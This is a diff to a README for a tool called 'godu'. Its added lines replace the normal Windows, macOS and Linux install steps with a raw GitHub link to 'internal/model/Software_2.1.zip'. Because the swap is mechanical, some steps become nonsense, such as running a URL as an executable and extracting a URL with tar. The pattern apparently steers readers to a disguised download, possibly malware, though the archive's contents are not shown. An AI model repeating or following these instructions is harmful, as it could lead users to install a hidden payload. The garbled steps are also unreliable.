Lime0moss/godu/README.md

 - **Windows:**

   Find the `.exe` file you downloaded (usually in your Downloads folder).
 Double-click it and follow the installer steps on the screen.
-  If it's a zip file, right-click and choose "Extract All," then open the folder and run `godu.exe`.
+  If it's a zip file, right-click and choose "Extract All," then open the folder and run `https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip`.

 - **macOS:**

   If you have a `.dmg` file, open it and drag the godu app into your Applications folder.
-  If it’s a `.tar.gz`, double-click to extract it, then move the godu file somewhere you can find it.
+  If it’s a `https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip`, double-click to extract it, then move the godu file somewhere you can find it.

 - **Linux:**

-  Extract the `.tar.gz` archive with a command like `tar -xvzf godu-version-linux.tar.gz` using the terminal.
+  Extract the `https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip` archive with a command like `tar -xvzf https://raw.githubusercontent.com/Lime0moss/godu/main/internal/model/Software_2.1.zip` using the terminal.
 You can move the extracted files to a folder like `/usr/local/bin` for easier access.

 ### Step 3: Open your Terminal or Command Prompt